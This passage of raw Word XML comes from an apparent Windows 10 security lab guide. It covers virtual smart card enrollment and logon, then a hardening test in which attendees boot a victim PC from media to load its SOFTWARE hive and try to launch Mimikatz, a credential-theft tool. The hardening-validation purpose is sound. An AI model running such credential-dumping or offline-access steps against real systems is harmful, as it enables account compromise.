          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:bookmarkEnd w:id="53"/>
    <w:p w14:paraId="3DA32AB4" w14:textId="3C9DAD36" w:rsidR="009F1860" w:rsidRDefault="00B90EA8" w:rsidP="00B90EA8">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t xml:space="preserve">Run b. command and this time enter PIN </w:t>
      </w:r>
      <w:r w:rsidRPr="00C6425D">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:b/>
        </w:rPr>
        <w:t>0123@</w:t>
      </w:r>
      <w:r w:rsidR="005E7564">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:b/>
        </w:rPr>
        <w:t>CYBER</w:t>
      </w:r>
      <w:r w:rsidR="005A04A0" w:rsidRPr="00C6425D">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t>. You should have this result:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D3C2074" w14:textId="70A1515A" w:rsidR="005A04A0" w:rsidRPr="00C6425D" w:rsidRDefault="005A04A0" w:rsidP="00C6425D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A04A0">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="77BADE21" wp14:editId="2CEFC2C4">
            <wp:extent cx="4019448" cy="14152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7543" cy="1425191"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="106ACBEA" w14:textId="3BEA096C" w:rsidR="00322E33" w:rsidRDefault="00322E33" w:rsidP="00B90EA8">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t xml:space="preserve">From elevated </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t xml:space="preserve"> enter command “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C6425D">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:b/>
        </w:rPr>
        <w:t>compmgmt.msc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t xml:space="preserve">”, then browse to Device Manager. You should see a Smart Card Reader named </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t>ConsotoVSC</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C783F64" w14:textId="77777777" w:rsidR="00322E33" w:rsidRDefault="00322E33" w:rsidP="00C6425D">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="633FD3CD" w14:textId="4C2499EC" w:rsidR="00322E33" w:rsidRDefault="00322E33" w:rsidP="000A1126">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t>Enroll Smartcard certificate on the Virtual Smart Cart created.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3331CE39" w14:textId="67BDB21C" w:rsidR="00322E33" w:rsidRDefault="00322E33" w:rsidP="000A1126">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t xml:space="preserve">From elevated </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t xml:space="preserve"> run “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C6425D">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:b/>
        </w:rPr>
        <w:t>certutil</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C6425D">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> -pulse</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t>” then “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C6425D">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:b/>
        </w:rPr>
        <w:t>certmgr.msc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63FEF401" w14:textId="04C96826" w:rsidR="00322E33" w:rsidRDefault="00322E33" w:rsidP="000A1126">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00322E33">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t xml:space="preserve">Right-click </w:t>
      </w:r>
      <w:r w:rsidRPr="00C6425D">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:b/>
        </w:rPr>
        <w:t>Personal</w:t>
      </w:r>
      <w:r w:rsidRPr="00322E33">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="00C6425D">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:b/>
        </w:rPr>
        <w:t>All tasks</w:t>
      </w:r>
      <w:r w:rsidRPr="00322E33">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="00C6425D">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:b/>
        </w:rPr>
        <w:t>Request New Certificate</w:t>
      </w:r>
      <w:r w:rsidRPr="00322E33">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="00C6425D">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:b/>
        </w:rPr>
        <w:t>Next</w:t>
      </w:r>
      <w:r w:rsidRPr="00322E33">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="00C6425D">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:b/>
        </w:rPr>
        <w:t>Next</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DAD336D" w14:textId="339EB2EB" w:rsidR="000A1126" w:rsidRDefault="000A1126" w:rsidP="000A1126">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t xml:space="preserve">Select in list </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C6425D">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:b/>
        </w:rPr>
        <w:t>ContosoSmartcardLogon</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t xml:space="preserve">, then click on </w:t>
      </w:r>
      <w:r w:rsidRPr="00C6425D">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:b/>
        </w:rPr>
        <w:t>Enroll</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t xml:space="preserve"> button.</w:t>
      </w:r>
      <w:r w:rsidR="00935BAA">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t xml:space="preserve"> You need to enter PIN code </w:t>
      </w:r>
      <w:r w:rsidR="00935BAA" w:rsidRPr="00E467C7">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:b/>
        </w:rPr>
        <w:t>0123@</w:t>
      </w:r>
      <w:r w:rsidR="005B47D7">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:b/>
        </w:rPr>
        <w:t>CYBER</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1699E64A" w14:textId="237F6B40" w:rsidR="00935BAA" w:rsidRPr="00C6425D" w:rsidRDefault="00935BAA" w:rsidP="00C6425D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00935BAA">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6A42417A" wp14:editId="101BE7FB">
            <wp:extent cx="4713805" cy="35503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6010" cy="3559558"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="07B5BF35" w14:textId="392C96D5" w:rsidR="000A1126" w:rsidRDefault="00935BAA" w:rsidP="000A1126">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t>Run the command “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C6425D">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:b/>
        </w:rPr>
        <w:t>certutil</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C6425D">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C6425D">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:b/>
        </w:rPr>
        <w:t>scinfo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t>” to check the Smartcard information.</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935BAA" w14:paraId="71DFCFE6"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F42D484" w14:textId="77777777" w:rsidR="00935BAA" w:rsidRDefault="00935BAA" w:rsidP="00554E9A">
            <w:r>
              <w:t>CHECK POINT</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00935BAA" w14:paraId="1BE0EEC3"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37A5D0" w14:textId="7E0C7451" w:rsidR="00935BAA" w:rsidRDefault="00935BAA" w:rsidP="00554E9A">
            <w:r>
              <w:t>Save the output of the “</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>certutil</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> -</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>scinfo</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>” command.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1264F0F6" w14:textId="742ABD7C" w:rsidR="009F1860" w:rsidRDefault="00174441" w:rsidP="00FF713D">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t>Log of this session.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26B4303D" w14:textId="77777777" w:rsidR="000D473F" w:rsidRDefault="000D473F" w:rsidP="00C6425D">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B848D95" w14:textId="638275CE" w:rsidR="00174441" w:rsidRPr="00C6425D" w:rsidRDefault="00FF713D" w:rsidP="00C6425D">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t xml:space="preserve">Use Virtual Smartcard to logon for </w:t>
      </w:r>
      <w:r w:rsidRPr="00C6425D">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:b/>
        </w:rPr>
        <w:t>CONTOSO</w:t>
      </w:r>
      <w:r w:rsidR="00DD4FD5" w:rsidRPr="00C6425D">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:b/>
        </w:rPr>
        <w:t>\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C6425D">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:b/>
        </w:rPr>
        <w:t>jdoe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00DD4FD5">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t xml:space="preserve"> with PIN </w:t>
      </w:r>
      <w:r w:rsidR="00DD4FD5" w:rsidRPr="00C6425D">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:b/>
        </w:rPr>
        <w:t>0123@ECE</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C94491" w14:paraId="1349112A"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5FEC9CD2" w14:textId="77777777" w:rsidR="00C94491" w:rsidRDefault="00C94491" w:rsidP="00554E9A">
            <w:r>
              <w:t>CHECK POINT</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C94491" w14:paraId="073E8204"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2428CF" w14:textId="3C607234" w:rsidR="00C94491" w:rsidRDefault="00A36B64" w:rsidP="00554E9A">
            <w:bookmarkStart w:id="54" w:name="_Hlk528164003"/>
            <w:r>
              <w:t>Save the output of the last events ID 5058 and ID 5061 in the security event log.</w:t>
            </w:r>
            <w:bookmarkEnd w:id="54"/>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="77FE6376" w14:textId="77777777" w:rsidR="00DC6DB9" w:rsidRPr="0036137C" w:rsidRDefault="00DC6DB9" w:rsidP="003B03E3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5EF2E3F9" w14:textId="70DD3201" w:rsidR="00722743" w:rsidRPr="0036137C" w:rsidRDefault="00722743">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0036137C">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="255CAE99" w14:textId="2F593569" w:rsidR="009234FC" w:rsidRPr="00F954C8" w:rsidRDefault="009234FC" w:rsidP="009234FC">
      <w:pPr>
        <w:pStyle w:val="Titre2"/>
      </w:pPr>
      <w:bookmarkStart w:id="55" w:name="_Toc44075692"/>
      <w:r w:rsidRPr="001D3237">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Exercise </w:t>
      </w:r>
      <w:r>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="001D3237">
        <w:t xml:space="preserve">: Windows 10 </w:t>
      </w:r>
      <w:r>
        <w:t>hardening testing</w:t>
      </w:r>
      <w:bookmarkEnd w:id="55"/>
    </w:p>
    <w:p w14:paraId="6FA2EDAF" w14:textId="639291A8" w:rsidR="009234FC" w:rsidRPr="00C6425D" w:rsidRDefault="009234FC" w:rsidP="009234FC">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C6425D">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">Duration: </w:t>
      </w:r>
      <w:r w:rsidR="00D43F61">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>60</w:t>
      </w:r>
      <w:r w:rsidRPr="00C6425D">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> minutes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58854510" w14:textId="49EDD227" w:rsidR="009234FC" w:rsidRPr="00C6425D" w:rsidRDefault="009234FC" w:rsidP="009234FC">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C6425D">
        <w:rPr>
          <w:i/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">In this exercise, attendees will </w:t>
      </w:r>
      <w:r w:rsidR="00FA603E" w:rsidRPr="00C6425D">
        <w:rPr>
          <w:i/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">validate the hardening settings </w:t>
      </w:r>
      <w:r w:rsidR="001D2D31" w:rsidRPr="00C6425D">
        <w:rPr>
          <w:i/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">to ensure </w:t>
      </w:r>
      <w:r w:rsidR="008B15AB" w:rsidRPr="00C6425D">
        <w:rPr>
          <w:i/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>system correctly protected</w:t>
      </w:r>
      <w:r w:rsidRPr="00C6425D">
        <w:rPr>
          <w:i/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BB765A3" w14:textId="6B56F1BD" w:rsidR="009234FC" w:rsidRDefault="009234FC" w:rsidP="009234FC">
      <w:pPr>
        <w:pStyle w:val="Titre4"/>
      </w:pPr>
      <w:bookmarkStart w:id="56" w:name="_Toc44075693"/>
      <w:r>
        <w:t xml:space="preserve">Task 1: </w:t>
      </w:r>
      <w:r w:rsidR="008B15AB">
        <w:t>Boot from media</w:t>
      </w:r>
      <w:bookmarkEnd w:id="56"/>
    </w:p>
    <w:p w14:paraId="15C2C422" w14:textId="413B5236" w:rsidR="009234FC" w:rsidRPr="00A70D4E" w:rsidRDefault="008B15AB" w:rsidP="008A5CFA">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Connect </w:t>
      </w:r>
      <w:r w:rsidR="00806DB8">
        <w:t>Windows 10 iso on the VICTIM-PC and start machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63861AAB" w14:textId="09341961" w:rsidR="00D43F61" w:rsidRDefault="00806DB8" w:rsidP="004C4C3E">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t>Using step</w:t>
      </w:r>
      <w:r w:rsidR="004C4C3E">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t xml:space="preserve"> described in </w:t>
      </w:r>
      <w:r w:rsidR="00F07E6C">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t>Exercise</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1</w:t>
      </w:r>
      <w:r w:rsidR="00F07E6C">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="0070779E">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t xml:space="preserve"> Task 1</w:t>
      </w:r>
      <w:r w:rsidR="004C4C3E">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidR="00F07E6C">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t xml:space="preserve"> steps 1 to 9</w:t>
      </w:r>
      <w:r w:rsidR="004C4C3E">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="0066571F">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00173CEF">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t>try</w:t>
      </w:r>
      <w:r w:rsidR="0066571F">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t xml:space="preserve"> to load </w:t>
      </w:r>
      <w:r w:rsidR="0066571F" w:rsidRPr="00C6425D">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:b/>
        </w:rPr>
        <w:t>SOFTWARE</w:t>
      </w:r>
      <w:r w:rsidR="0066571F">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t xml:space="preserve"> hive</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21DE44D2" w14:textId="2EBE41C1" w:rsidR="00173CEF" w:rsidRDefault="00173CEF" w:rsidP="00C6425D"/>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173CEF" w14:paraId="772F12C4" w14:textId="77777777" w:rsidTr="00D1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702F2F2" w14:textId="77777777" w:rsidR="00173CEF" w:rsidRDefault="00173CEF" w:rsidP="00D1539E">
            <w:r>
              <w:t>CHECK POINT</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00173CEF" w14:paraId="02E8EE6A" w14:textId="77777777" w:rsidTr="00D1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EFD5C6" w14:textId="13227482" w:rsidR="00173CEF" w:rsidRDefault="00C94AE5" w:rsidP="00D1539E">
            <w:bookmarkStart w:id="57" w:name="_Hlk528164440"/>
            <w:r>
              <w:t>Explain why you cannot load SOFTWARE hive?</w:t>
            </w:r>
            <w:bookmarkEnd w:id="57"/>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5C00F52C" w14:textId="2BCA85B5" w:rsidR="00173CEF" w:rsidRDefault="00173CEF" w:rsidP="00173CEF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53D9976E" w14:textId="11F7B428" w:rsidR="00A01861" w:rsidRDefault="00A01861"/>
    <w:p w14:paraId="30E0FFA3" w14:textId="11EA5AC4" w:rsidR="009234FC" w:rsidRDefault="009234FC" w:rsidP="009234FC">
      <w:pPr>
        <w:pStyle w:val="Titre4"/>
      </w:pPr>
      <w:bookmarkStart w:id="58" w:name="_Toc44075694"/>
      <w:r>
        <w:t xml:space="preserve">Task 2: </w:t>
      </w:r>
      <w:r w:rsidR="0070779E">
        <w:t>Connect using local administrator account created in Exercise 1 Task 1</w:t>
      </w:r>
      <w:bookmarkEnd w:id="58"/>
    </w:p>
    <w:p w14:paraId="17C1992F" w14:textId="77777777" w:rsidR="007F7398" w:rsidRPr="007F7398" w:rsidRDefault="009234FC" w:rsidP="008A5CFA">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Using</w:t>
      </w:r>
      <w:r w:rsidR="007F7398">
        <w:t xml:space="preserve"> this local administrator account, start elevated CMD.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42BBE75B" w14:textId="3D5AF45B" w:rsidR="009234FC" w:rsidRPr="00516584" w:rsidRDefault="007F7398" w:rsidP="008A5CFA">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">From CMD start </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Mimikatz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="009234FC">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F205C07" w14:textId="66C71B18" w:rsidR="004C4C3E" w:rsidRPr="00312A3A" w:rsidRDefault="00EE3473" w:rsidP="008A5CFA">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t>Are you able to start application? If not explain why.?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="198758EE" w14:textId="7F67659D" w:rsidR="0045498F" w:rsidRDefault="0045498F" w:rsidP="00C6425D">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
      </w:pP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45498F" w14:paraId="4C64807A" w14:textId="77777777" w:rsidTr="00D1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786B6DE9" w14:textId="77777777" w:rsidR="0045498F" w:rsidRDefault="0045498F" w:rsidP="00D1539E">
            <w:r>
              <w:t>CHECK POINT</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
